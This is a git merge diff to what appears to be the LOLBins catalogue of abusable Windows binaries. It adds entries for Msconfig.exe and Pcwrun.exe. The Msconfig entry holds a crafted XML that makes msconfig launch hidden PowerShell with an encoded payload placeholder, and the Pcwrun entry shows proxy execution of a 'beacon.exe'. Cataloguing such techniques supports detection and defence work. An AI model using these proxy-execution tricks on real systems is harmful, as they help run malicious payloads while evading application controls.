Merge pull request #9 from giMini/master

Add Msconfig.exe
2018-05-02 08:11:09 +02:00 · 2018-05-02 08:11:09 +02:00 · a9094f0d47
parent feb90b0650 e239ea7c64
commit a9094f0d47
3 changed files with 69 additions and 4 deletions
--- a/LOLBins.md
+++ b/LOLBins.md
@ -29,12 +29,14 @@ If you are missing from the acknowledgement, please let me know (I did not forge
 [Makecab.exe](OSBinaries/Makecab.md)      
 [Mavinject.exe](OSBinaries/Mavinject.md)       
 [Msbuild.exe](OSBinaries/Msbuild.md)    
+[Msconfig.exe](OSBinaries/Msconfig.md)  
 [Msdt.exe](OSBinaries/Msdt.md)     
 [Mshta.exe](OSBinaries/Mshta.md)     
 [Msiexec.exe](OSBinaries/Msiexec.md)    
 [Nltest.exe](OSBinaries/Nltest.md)    
 [Odbcconf.exe](OSBinaries/Odbcconf.md)     
 [Pcalua.exe](OSBinaries/Pcalua.md)    
+[Pcwrun.exe](OSBinaries/Pcwrun.md)
 [Powershell.exe](OSBinaries/Powershell.md)     
 [Presentationhost.exe](OSBinaries/Presentationhost.md)     
 [Print.exe](OSBinaries/Print.md)  
--- a/OSBinaries/Msconfig.md
+++ b/OSBinaries/Msconfig.md
@ -0,0 +1,37 @@
+## Msconfig.exe
+
+* Prerequisites
+
+add a crafted .xml in System32
+```
+<?xml version="1.0" ?> 
+<MSCONFIGTOOLS> 
+<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" 
+DEFAULT_OPT="-nop -sta -enc -w 1 YOURBASE64" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/> 
+</MSCONFIGTOOLS>
+```
+
+* Functions: Execute
+
+```
+Msconfig.exe -5  
+ 
+```
+
+Acknowledgements:
+* Pierre-Alexandre Braeken - @pabraeken
+
+
+Resources:
+* https://twitter.com/pabraeken/status/991314564896690177
+
+Full path:
+```
+c:\windows\system32\msconfig.exe
+```
+
+Notes:
+
+
+
+ 
--- a/OSBinaries/Pcwrun.md
+++ b/OSBinaries/Pcwrun.md
@ -0,0 +1,26 @@
+## Pcwrun.exe
+
+* Functions: Execute
+
+```
+Pcwrun.exe c:\temp\beacon.exe
+ 
+```
+
+Acknowledgements:
+* Pierre-Alexandre Braeken - @pabraeken
+
+
+Resources:
+* https://twitter.com/pabraeken/status/991335019833708544
+
+Full path:
+```
+c:\windows\system32\pcwrun.exe
+```
+
+Notes:
+
+
+
+